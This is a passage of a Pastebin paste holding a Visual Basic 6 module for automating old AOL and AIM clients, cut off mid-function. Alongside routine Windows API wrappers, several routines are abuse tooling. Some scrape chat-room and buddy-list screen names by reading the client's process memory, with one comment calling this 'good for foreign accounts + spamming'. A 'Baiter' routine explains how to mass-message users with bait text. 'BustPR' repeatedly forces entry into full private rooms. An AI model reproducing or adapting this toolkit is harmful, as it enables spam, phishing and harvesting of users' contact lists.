Advertisement
Guest User

Untitled

a guest
Feb 16th, 2016
292
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 362.57 KB | None | 0 0
  1. Attribute VB_Name = "Kai32"
  2. '-=====================================================-
  3. ' -= +------------------------------------------------+ =-
  4. ' -= | |\ =-
  5. ' -= | |¯¯|\ |¯¯|\ |¯¯|\ |¯¯¯¯¯¯|\ |¯¯¯¯¯¯|\ |\\ =-
  6. ' -= | | |\/ /\| |__|\||__|| |\||___ |\| |\\| =-
  7. ' -= | | |/ /\/ |¯¯¯¯¯|\ \\\\| \\|¯ |\| /¯¯___/\| |\\| =-
  8. ' -= | | /\/ | |\||¯¯|\ |¯¯|| |\|| ¯¯¯|\ |\\| =-
  9. ' -= | | \/ | | |\|| |\||______|\||______|\| |\\| =-
  10. ' -= | | |\ \ | |\|| |\| \\\\\\\\| \\\\\\\\| |\\| =-
  11. ' -= | | |\\ \ | | |\|| |\| ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯ |\\| =-
  12. ' -= | |__|\|__|\ |__|__|\||__|\| +-------------------+\\| =-
  13. ' -= | \\\\ \\\\| \\\\\\\| \\\\| |\\\\\\\\\\\\\\\\\\\\\\| =-
  14. ' -= | ¯¯¯ ¯¯¯ ¯¯¯¯¯¯ ¯¯¯ |\\\\\\\\\\\\\\\\\\\\\\| =-
  15. ' -= +----------------------------+\\|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ =-
  16. ' -= \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| =====================-
  17. ' -= \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| =-
  18. ' -= ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ =-
  19. ' -=================================-
  20.  
  21. '[aol versions]
  22. ' 5.0 [some]
  23. ' 4.0 [alot]
  24. ' 3.0 [a little.. because of aol 95]
  25. ' 2.5 [some]
  26.  
  27. 'made with: visual basic 6
  28.  
  29. 'number of subs to date: 333
  30.  
  31. Global ccomSilent As Boolean, ccomAnti As Boolean
  32. Global blnOHScroll As Boolean, blnClick As Boolean, blnExploit As Boolean
  33. Global vbTray As NOTIFYICONDATA
  34.  
  35. 'findwindow(ex) declarations
  36. Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  37. Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
  38. 'aol listchange declaration [you need aolstuff.dll]
  39. Public Declare Function CB_Change Lib "aolstuff.dll" Alias "AOLChangeList" (ByVal p1&, ByVal p2&, ByVal p3$) As Long
  40. 'getwindowtext declarations
  41. Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  42. Public Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hWnd As Long) As Long
  43. 'ini declarations
  44. Public Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
  45. Public Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
  46. 'get menu/sub menu declarations
  47. Public Declare Function GetMenu Lib "user32" (ByVal hWnd As Long) As Long
  48. Public Declare Function GetMenuItemCount Lib "user32" (ByVal hMenu As Long) As Long
  49. Public Declare Function GetMenuItemID Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
  50. Public Declare Function GetMenuString Lib "user32" Alias "GetMenuStringA" (ByVal hMenu As Long, ByVal wIDItem As Long, ByVal lpString As String, ByVal nMaxCount As Long, ByVal wFlag As Long) As Long
  51. Public Declare Function GetSubMenu Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
  52. 'send/post message declarations
  53. Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  54. Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
  55. Public Declare Function SendMessageLong Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  56. Public Declare Function SendMessageByNum Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  57. Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
  58. 'cursor position declarations
  59. Public Declare Function SetCursorPos Lib "user32" (ByVal X As Long, ByVal Y As Long) As Long
  60. Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
  61. 'rect declares
  62. Public Declare Function MoveWindow Lib "user32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  63. Public Declare Function GetWindowRect Lib "user32" (ByVal hWnd As Long, lpRect As RECT) As Long
  64. Public Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
  65. 'other delcarations
  66. Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (destination As Any, source As Any, ByVal length As Long)
  67. Public Declare Function EnableWindow Lib "user32" (ByVal hWnd As Long, ByVal fEnable As Long) As Long
  68. Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  69. Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
  70. Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
  71. Public Declare Function IsWindowVisible Lib "user32" (ByVal hWnd As Long) As Long
  72. Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  73. Public Declare Function MciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  74. Public Declare Function mciGetErrorString Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal dwError As Long, ByVal lpstrBuffer As String, ByVal uLength As Long) As Long
  75. Public Declare Function ReleaseCapture Lib "user32" () As Long
  76. Public Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
  77. Public Declare Function ShowWindow Lib "user32" (ByVal hWnd As Long, ByVal nCmdShow As Long) As Long
  78. Public Declare Function GetTopWindow Lib "user32" (ByVal hWnd As Long) As Long
  79. Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
  80. Public Declare Function Shell_NotifyIcon Lib "shell32" Alias "Shell_NotifyIconA" (ByVal dwMessage As Long, pnid As NOTIFYICONDATA) As Boolean
  81. Public Declare Function SetForegroundWindow Lib "user32" (ByVal hWnd As Long) As Long
  82. Public Declare Function sndPlaySound Lib "winmm.dll" Alias "PlaySoundA" (ByVal lpszName As String, ByVal hModule As Long, ByVal dwFlags As Long) As Long
  83.  
  84. 'main commands
  85. Public Const WM_CHAR = &H102
  86. Public Const WM_CLOSE = &H10
  87. Public Const WM_COMMAND = &H111
  88. Public Const WM_GETTEXT = &HD
  89. Public Const WM_GETTEXTLENGTH = &HE
  90. Public Const WM_KEYDOWN = &H100
  91. Public Const WM_KEYUP = &H101
  92. Public Const WM_USER = &H400
  93. Public Const WM_LBUTTONDBLCLK = &H203
  94. Public Const WM_LBUTTONDOWN = &H201
  95. Public Const WM_LBUTTONUP = &H202
  96. Public Const WM_RBUTTONDOWN = &H204
  97. Public Const WM_RBUTTONUP = &H205
  98. Public Const WM_MOVE = &HF012
  99. Public Const WM_MOUSEMOVE = &H200
  100. Public Const WM_SETTEXT = &HC
  101. Public Const WM_SYSCOMMAND = &H112
  102. Public Const WM_COPY = &H301
  103.  
  104. 'keyboard constants
  105. Public Const VK_DOWN = &H28
  106. Public Const VK_LEFT = &H25
  107. Public Const VK_MENU = &H12
  108. Public Const VK_RETURN = &HD
  109. Public Const VK_RIGHT = &H27
  110. Public Const VK_SHIFT = &H10
  111. Public Const VK_SPACE = &H20
  112. Public Const VK_UP = &H26
  113.  
  114. 'checkbox constants
  115. Public Const BM_GETCHECK = &HF0
  116. Public Const BM_SETCHECK = &HF1
  117.  
  118. 'sound constants
  119. Public Const SND_ASYNC = &H1
  120. Public Const SND_NODEFAULT = &H2
  121. Public Const SND_FLAG = SND_ASYNC Or SND_NODEFAULT
  122.  
  123. 'showwindow constants
  124. Public Const SW_HIDE = 0
  125. Public Const SW_SHOW = 5
  126. Public Const SW_MAXIMIZE = 3
  127. Public Const SW_MINIMIZE = 6
  128. Public Const SW_RESTORE = 9
  129. Public Const SW_SHOWDEFAULT = 10
  130. Public Const SW_SHOWMAXIMIZED = 3
  131. Public Const SW_SHOWMINIMIZED = 2
  132. Public Const SW_SHOWMINNOACTIVE = 7
  133. Public Const SW_SHOWNOACTIVATE = 4
  134. Public Const SW_SHOWNORMAL = 1
  135.  
  136. 'set window position constants [swp]
  137. Public Const SWP_NOMOVE = &H2
  138. Public Const SWP_NOSIZE = &H1
  139.  
  140. 'other constants
  141. Public Const ENTER_KEY = 13
  142. Public Const PROCESS_READ = &H10
  143. Public Const RIGHTS_REQUIRED = &HF0000
  144. Public Const FLAGS = SWP_NOMOVE Or SWP_NOSIZE
  145.  
  146. 'listbox constants
  147. Public Const LB_GETCOUNT = &H18B
  148. Public Const LB_GETITEMDATA = &H199
  149. Public Const LB_GETTEXT = &H189
  150. Public Const LB_GETTEXTLEN = &H18A
  151. Public Const LB_SETSEL = &H185
  152. Public Const LB_SETCURSEL = &H186
  153. Public Const LB_FINDSTRINGEXACT = &H1A2
  154.  
  155. 'combobox constants
  156. Public Const CB_GETCOUNT = &H146
  157. Public Const CB_GETCURSEL = &H147
  158. Public Const CB_GETITEMDATA = &H150
  159. Public Const CB_SETCURSEL = &H14E
  160.  
  161. 'notifyicondata constants
  162. Public Const NIM_ADD = &H0
  163. Public Const NIM_DELETE = &H2
  164. Public Const NIF_ICON = &H2
  165. Public Const NIF_MESSAGE = &H1
  166. Public Const NIM_MODIFY = &H1
  167. Public Const NIF_TIP = &H4
  168.  
  169. 'hWnd constants
  170. Public Const HWND_NOTOPMOST = -2
  171. Public Const HWND_TOPMOST = -1
  172.  
  173. 'declaring api's type
  174. Public Type POINTAPI
  175. X As Long
  176. Y As Long
  177. End Type
  178.  
  179. 'declaring notifyicondata's type
  180. Public Type NOTIFYICONDATA
  181. cbSize As Long
  182. hWnd As Long
  183. uID As Long
  184. uFlags As Long
  185. uCallbackMessage As Long
  186. hIcon As Long
  187. szTip As String * 64
  188. End Type
  189.  
  190. 'rect's type [for window rectangle coordinates]
  191. Type RECT
  192. Left As Long
  193. Top As Long
  194. Right As Long
  195. Bottom As Long
  196. End Type
  197.  
  198. Public Sub ActivateAOL()
  199. 'activates aol
  200. Dim aol As Long
  201.  
  202. aol& = FindWindow("AOL Frame25", vbNullString)
  203. AppActivate GetText(aol&)
  204.  
  205. End Sub
  206.  
  207. Public Sub AddAOLList(hWnd As Long, list As ListBox, Optional AddUser As Boolean)
  208. 'adds list from aol 4.0/3.0 to listbox
  209. 'just get the handle of the listbox, and put this:
  210. 'Call AddAOLList(hWndOfAOLListbox, List1)
  211.  
  212. On Error Resume Next
  213. Dim cProcess As Long, itmHold As Long, screenname As String
  214. Dim psnHold As Long, rBytes As Long, Index As Long, Room As Long
  215. Dim rList As Long, sThread As Long, mThread As Long
  216.  
  217. Dim iTab As Long, iTab2 As Long
  218.  
  219. rList& = hWnd
  220. If rList& = 0& Then Exit Sub
  221. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  222. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  223. If mThread& Then
  224. For Index& = 0 To SendMessage(rList, LB_GETCOUNT, 0, 0) - 1
  225. screenname$ = String$(4, vbNullChar)
  226. itmHold& = SendMessage(rList, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  227. itmHold& = itmHold& + 24
  228. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  229. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  230. psnHold& = psnHold& + 6
  231. screenname$ = String$(16, vbNullChar)
  232. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  233. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  234. iTab& = InStr(1, screenname$, Chr(9))
  235. iTab2& = InStr(iTab& + 1, screenname$, Chr(9))
  236. screenname$ = Mid(screenname$, iTab& + 1, iTab2& - 2)
  237. screenname$ = ReplaceText(screenname$, Chr(9), "")
  238. If AddUser = True Or screenname$ <> GetUser Then
  239. list.AddItem Trim(screenname$) + "@aol.com"
  240. End If
  241. Next Index&
  242. Call CloseHandle(mThread)
  243. End If
  244. End Sub
  245.  
  246. Public Sub AddBuddyList(lst As ListBox)
  247. 'adds buddylist sn's to listbox in vb
  248. 'good for foreign accounts + spamming
  249. Dim aol As Long, mdi As Long, blwin As Long, BLIcon As Long
  250. Dim blsWin As Long, blsList As Long, kwFound As Long
  251. Dim lbVar As Long, eblWin As Long, eblList As Long, eblCount As Long
  252.  
  253. aol& = FindWindow("AOL Frame25", vbNullString)
  254. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  255. blwin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  256.  
  257. If aol& = 0 Then Exit Sub
  258.  
  259. If blwin& = 0& Then
  260. Call Keyword("bv")
  261. End If
  262.  
  263. Do
  264. DoEvents
  265. blwin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  266. kwFound& = FindWindowEx(mdi&, 0&, "AOL Child", "Keywords Found")
  267. If kwFound& <> 0& Then Exit Sub
  268. BLIcon& = FindWindowEx(blwin&, 0&, "_AOL_Icon", vbNullString)
  269. BLIcon& = FindWindowEx(blwin&, BLIcon&, "_AOL_Icon", vbNullString)
  270. BLIcon& = FindWindowEx(blwin&, BLIcon&, "_AOL_Icon", vbNullString)
  271. Loop Until blwin& <> 0& And BLIcon& <> 0&
  272.  
  273. Call SendMessage(BLIcon&, WM_LBUTTONDOWN, 0&, 0&)
  274. Call SendMessage(BLIcon&, WM_LBUTTONUP, 0&, 0&)
  275.  
  276. Do
  277. DoEvents
  278. blsWin& = FindBuddyLists
  279. blsList& = FindWindowEx(blsWin&, 0&, "_AOL_Listbox", vbNullString)
  280. Loop Until blsWin& <> 0& And blsList& <> 0&
  281.  
  282. For lbVar& = 0 To SendMessage(blsList&, LB_GETCOUNT, 0&, 0&) - 1
  283. Call SendMessage(blsList&, LB_SETCURSEL, lbVar&, 0&)
  284. Call PostMessage(blsList&, WM_LBUTTONDBLCLK, 0&, 0&)
  285.  
  286. Do
  287. DoEvents
  288. eblWin& = FindEditBuddyList
  289. eblList& = FindWindowEx(eblWin&, 0&, "_AOL_Listbox", vbNullString)
  290. eblCount& = SendMessage(eblList&, LB_GETCOUNT, 0&, 0&)
  291. Loop Until eblWin& <> 0& And eblList& <> 0&
  292.  
  293. pause (0.6)
  294.  
  295. Call AddAOLList(eblList&, lst)
  296.  
  297. Call PostMessage(eblWin&, WM_CLOSE, 0&, 0&)
  298. Next lbVar&
  299.  
  300. Call PostMessage(blsWin&, WM_CLOSE, 0&, 0&)
  301. End Sub
  302.  
  303. Public Sub AddBuddyList25(list As ListBox)
  304. 'adds buddylist to listbox in vb
  305. 'this only works for me on aol 3.0
  306. '[aol 2.5 is 16 bit]
  307. Dim aol As Long, mdi As Long, bWin As Long
  308. Dim bIcon As Long, sWin As Long, bList As Long, lbVar As Long
  309. Dim eblWin As Long, eblList As Long, eblCount As Long
  310.  
  311. aol& = FindWindow("AOL Frame25", vbNullString)
  312. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  313.  
  314. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  315. If bWin& = 0& Then
  316. Call Keyword("bv")
  317. Do
  318. DoEvents
  319. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  320. Loop Until bWin& <> 0&
  321. End If
  322.  
  323. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  324. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  325. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  326.  
  327. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  328. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  329.  
  330. Do
  331. DoEvents
  332. sWin& = FindBuddyLists
  333. bList& = FindWindowEx(sWin&, 0&, "_AOL_Listbox", vbNullString)
  334. Loop Until sWin& <> 0& And bList& <> 0&
  335.  
  336. For lbVar& = 0 To SendMessage(bList&, LB_GETCOUNT, 0&, 0&) - 1
  337. Call SendMessage(bList&, LB_SETCURSEL, lbVar&, 0&)
  338. Call PostMessage(bList&, WM_LBUTTONDBLCLK, 0&, 0&)
  339.  
  340. Do
  341. DoEvents
  342. eblWin& = FindEditBuddyList
  343. eblList& = FindWindowEx(eblWin&, 0&, "_AOL_Listbox", vbNullString)
  344. eblCount& = SendMessage(eblList&, LB_GETCOUNT, 0&, 0&)
  345. Loop Until eblWin& <> 0& And eblList& <> 0&
  346.  
  347. pause (0.6)
  348.  
  349. Call AddAOLList(eblList&, list)
  350.  
  351. Call PostMessage(eblWin&, WM_CLOSE, 0&, 0&)
  352. Next lbVar&
  353.  
  354. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  355. End Sub
  356.  
  357. Public Sub AddLogOn()
  358. 'adds # of signons to ini
  359. Dim LogOns As Long, strLogOns As String
  360. strLogOns$ = GetFromINI("ph2", "log ons", App.Path + "\ph2.ini")
  361. strLogOns$ = strLogOns$ + 1
  362. Call WritePrivateProfileString("ph2", "log ons", strLogOns$, App.Path + "\ph2.ini")
  363. End Sub
  364.  
  365. Public Sub AddOpenedBuddy(Buddy As String)
  366. 'adds buddy to the little 'add buddy' window..
  367. 'you know what i mean
  368. Dim winEBL As Long, bEdit As Long, bIcon As Long
  369. Dim blStatic As Long, blString As String, blText As String
  370.  
  371. winEBL& = FindEditBuddyList
  372.  
  373. bEdit& = FindWindowEx(winEBL&, 0&, "_AOL_Edit", vbNullString)
  374. bEdit& = FindWindowEx(winEBL&, bEdit&, "_AOL_Edit", vbNullString)
  375. bIcon& = FindWindowEx(winEBL&, 0&, "_AOL_Icon", vbNullString)
  376.  
  377. Call SendMessageByString(bEdit&, WM_SETTEXT, 0&, Buddy$)
  378.  
  379. Call SendMessageLong(bEdit&, WM_CHAR, ENTER_KEY, 0&)
  380.  
  381. Do
  382. DoEvents
  383. blStatic& = FindWindowEx(winEBL&, 0&, "_AOL_Static", vbNullString)
  384. blStatic& = FindWindowEx(winEBL&, blStatic&, "_AOL_Static", vbNullString)
  385. blStatic& = FindWindowEx(winEBL&, blStatic&, "_AOL_Static", vbNullString)
  386. blStatic& = FindWindowEx(winEBL&, blStatic&, "_AOL_Static", vbNullString)
  387. blStatic& = FindWindowEx(winEBL&, blStatic&, "_AOL_Static", vbNullString)
  388. blString$ = GetText(blStatic&)
  389. blText$ = GetText(bEdit&)
  390. Loop Until blText$ = "" Or InStr(1, blString$, "already in") <> 0& Or InStr(1, blString$, "too short") <> 0& Or InStr(1, blString$, "not given") <> 0& Or InStr(1, blString$, "Invalid character") <> 0&
  391.  
  392. Call SendMessageByString(blStatic&, WM_SETTEXT, 0&, "")
  393. End Sub
  394.  
  395. Public Sub AddRoom(list As ListBox, Optional AddUser As Boolean)
  396. 'self explanatory
  397. On Error Resume Next
  398. Dim cProcess As Long, itemHold As Long, screenname As String
  399. Dim psnHold As Long, rBytes As Long, Index As Long, Room As Long
  400. Dim rList As Long, sThread As Long, mThread As Long
  401. Room& = FindRoom&
  402. If Room& = 0& Then Exit Sub
  403. rList& = FindWindowEx(Room&, 0&, "_AOL_Listbox", vbNullString)
  404. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  405. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  406. If mThread& Then
  407. For Index& = 0 To SendMessage(rList, LB_GETCOUNT, 0, 0) - 1
  408. screenname$ = String$(4, vbNullChar)
  409. itemHold& = SendMessage(rList, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  410. itemHold& = itemHold& + 24
  411. Call ReadProcessMemory(mThread&, itemHold&, screenname$, 4, rBytes)
  412. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  413. psnHold& = psnHold& + 6
  414. screenname$ = String$(16, vbNullChar)
  415. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  416. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  417. If screenname$ <> GetUser$ Or AddUser = True Then
  418. list.AddItem screenname$
  419. End If
  420. Next Index&
  421. Call CloseHandle(mThread)
  422. End If
  423. End Sub
  424.  
  425. Public Sub AIM_Addroom(list As ListBox, Optional AddUser As Boolean)
  426. 'adds aim's room members to listbox
  427. Dim ChatRoom As Long, lTree As Long, lCount As Long
  428. Dim lngVar As Long, nLen As Long, lBuff As String, lngRetVal As Long
  429. Dim iTab As Long, lText As String, Name As String
  430.  
  431. ChatRoom& = AIM_FindRoom
  432.  
  433. If ChatRoom& <> 0& Then
  434. lTree& = FindWindowEx(ChatRoom&, 0, "_Oscar_Tree", vbNullString)
  435. lCount = SendMessage(lTree&, LB_GETCOUNT, 0, 0)
  436. For lngVar& = 0 To lCount - 1
  437. Call SendMessageByString(lTree&, LB_SETCURSEL, lngVar&, 0)
  438. nLen = SendMessage(lTree&, LB_GETTEXTLEN, lngVar&, 0)
  439. lBuff$ = String$(nLen, 0)
  440. lngRetVal = SendMessageByString(lTree&, LB_GETTEXT, lngVar&, lBuff$)
  441. iTab = InStr(1, lBuff$, Chr$(9))
  442. lText$ = Right$(lBuff$, (Len(lBuff$) - (iTab)))
  443. iTab = InStr(1, lText$, Chr$(9))
  444. lText$ = Right$(lText$, (Len(lText$) - (iTab)))
  445. Name$ = lText$
  446. If Name$ <> AIM_GetUser Or AddUser = True Then
  447. list.AddItem Name$
  448. End If
  449. Next lngVar&
  450. End If
  451. End Sub
  452.  
  453. Function AIM_FindRoom() As Long
  454. 'finds an aim room
  455. Dim cWin As Long, cCaption As String
  456.  
  457. cWin& = FindWindow("AIM_ChatWnd", vbNullString)
  458. cCaption$ = GetText(cWin&)
  459.  
  460. If InStr(1, cCaption$, "Chat Room:") = 1 Then
  461. AIM_FindRoom& = cWin&
  462. Else
  463. AIM_FindRoom& = 0&
  464. End If
  465.  
  466. End Function
  467.  
  468. Public Function AIM_GetUser() As String
  469. 'gets current aim sn
  470. Dim bWin As Long, bString As String
  471.  
  472. bWin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
  473. bString$ = GetText(bWin&)
  474.  
  475. If InStr(bString$, "'s Buddy List") <> 0 Then
  476. bString$ = Mid$(bString$, 1, (InStr(bString$, "'") - 1))
  477. AIM_GetUser$ = bString$
  478. Exit Function
  479. End If
  480.  
  481. AIM_GetUser$ = "n/a"
  482. End Function
  483.  
  484. Public Function AOLVersion() As String
  485. 'returns w/ the value aol the
  486. 'current aol version.
  487. 'outcomes:
  488. ' 2.5
  489. ' 3
  490. ' 4
  491. ' 5
  492. Dim aol As Long, gMenu As Long, Mnu As Long
  493. Dim sMenu As Long, sItem As Long, mString As String
  494. Dim fString As Long, tb As Long, TBar As Long
  495. Dim tCombo As Long, tEdit As Long
  496.  
  497. aol& = FindWindow("AOL Frame25", vbNullString)
  498. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  499. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  500. tCombo& = FindWindowEx(TBar&, 0&, "_AOL_Combobox", vbNullString)
  501. tEdit& = FindWindowEx(tCombo&, 0&, "Edit", vbNullString)
  502.  
  503. If tEdit& <> 0& And tCombo& <> 0& Then
  504. gMenu& = GetMenu(aol&)
  505.  
  506. sMenu& = GetSubMenu(gMenu&, 4&)
  507. sItem& = GetMenuItemID(sMenu&, 9&)
  508. mString$ = String$(100, " ")
  509.  
  510. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  511.  
  512. If InStr(1, LCase(mString$), LCase("&What's New in AOL 5.0")) <> 0& Then
  513. AOLVersion = "5.0"
  514. Else
  515. AOLVersion = "4.0"
  516. End If
  517. Else
  518. aol& = FindWindow("AOL Frame25", vbNullString)
  519. gMenu& = GetMenu(aol&)
  520.  
  521. Mnu& = GetMenuItemCount(GetMenu(aol&))
  522. If Mnu& = 8 Then
  523. sMenu& = GetSubMenu(gMenu&, 1)
  524. sItem& = GetMenuItemID(sMenu&, 8)
  525. mString$ = String$(100, " ")
  526. Else
  527. sMenu& = GetSubMenu(gMenu&, 0)
  528. sItem& = GetMenuItemID(sMenu&, 8)
  529. mString$ = String$(100, " ")
  530. End If
  531.  
  532. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  533.  
  534. If InStr(1, LCase(mString$), LCase("&LOGGING...")) <> 0& Then
  535. AOLVersion = "2.5"
  536. Else
  537. AOLVersion = "3.0"
  538. End If
  539. End If
  540. End Function
  541.  
  542.  
  543.  
  544. Public Sub Baiter()
  545. 'to make a baiter, you need this:
  546. 'a listbox [lstBait]
  547. 'another listbox [lstSN]
  548. 'a timer [tmr]
  549. 'a button [cmdBait]
  550. 'and a textbox [txtMessage]
  551.  
  552. 'in the timer, put this:
  553. ' call findbait(lstBait)
  554. ' imWin& = FindSentIM
  555. ' If imWin& <> 0& Then
  556. ' Call PostMessage(imWin&, WM_CLOSE, 0&, 0&)
  557. ' End If
  558.  
  559. 'in the button, put this:
  560. ' tmr.Enabled = True
  561. ' For i = 0 To lstSN.ListCount - 1
  562. ' Call InstantMessage(lstSN.List(i), txtMessage.Text)
  563. ' Pause (2)
  564. ' Next i
  565.  
  566. 'and that's it, you got a baiter
  567. 'make sure to put a stop button on it
  568. 'and maybe even some gathers. -=D
  569. End Sub
  570.  
  571. Public Function BCCList(list As ListBox) As String
  572. 'function - returns sn's in blind carbon copy format
  573. 'ex: (sn)(sn)(sn)(sn)
  574. Dim lLong As Long, lString As String
  575.  
  576. For lLong& = 0 To list.ListCount - 1
  577. lString$ = lString$ + "(" + list.list(lLong&) + ")"
  578. Next lLong&
  579. BCCList = lString$
  580. End Function
  581.  
  582. Public Sub BustPR(Room As String)
  583. 'busts pr.. non-stop!
  584. Dim bRoom As String, bWin As Long, bBut As Long
  585. Dim bSta As Long, bStr As String, lngTries As Long
  586.  
  587. bRoom$ = GetText(FindRoom)
  588. If LCase(TrimSpaces(bRoom$)) = LCase(TrimSpaces(Room$)) Then Exit Sub
  589.  
  590. Do
  591. DoEvents
  592.  
  593. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  594. Call KeyWord25("aol://2719:2-2-" + TrimSpaces(Room$))
  595. Else
  596. Call Keyword("aol://2719:2-2-" + TrimSpaces(Room$))
  597. End If
  598. lngTries& = lngTries& + 1
  599.  
  600. Do
  601. DoEvents
  602. '‹/•\› · kai³² ·
  603. bWin& = FindWindow("#32770", "America Online")
  604. bBut& = FindWindowEx(bWin&, 0&, "Button", "OK")
  605. bSta& = FindWindowEx(bWin&, 0&, "Static", vbNullString)
  606. bSta& = FindWindowEx(bWin&, bSta&, "Static", vbNullString)
  607. bStr$ = GetText(bSta&)
  608. Loop Until LCase(TrimSpaces(Room$)) = LCase(TrimSpaces(GetText(FindRoom&))) Or bWin& <> 0& And bBut& <> 0& And bSta& <> 0& And bStr$ <> ""
  609.  
  610. If bWin& <> 0& Then
  611. If InStr(1, bStr$, "you requested is full") <> 0& Then
  612. Call PostMessage(bBut&, WM_KEYDOWN, VK_SPACE, 0&)
  613. Call PostMessage(bBut&, WM_KEYUP, VK_SPACE, 0&)
  614. ElseIf InStr(1, LCase(bStr$), "error") <> 0& Then
  615. Call PostMessage(bBut&, WM_KEYDOWN, VK_SPACE, 0&)
  616. Call PostMessage(bBut&, WM_KEYUP, VK_SPACE, 0&)
  617. Exit Sub
  618. ElseIf InStr(1, bStr$, "name is not allowed") <> 0& Then
  619. Call PostMessage(bBut&, WM_KEYDOWN, VK_SPACE, 0&)
  620. Call PostMessage(bBut&, WM_KEYUP, VK_SPACE, 0&)
  621. Exit Sub
  622. End If
  623. Else
  624. Exit Do
  625. End If
  626. Loop
  627.  
  628. If lngTries <= 1& Then
  629. Call cChatSend("• pH2 · Entered " + GetText(FindRoom&) + "")
  630. Else
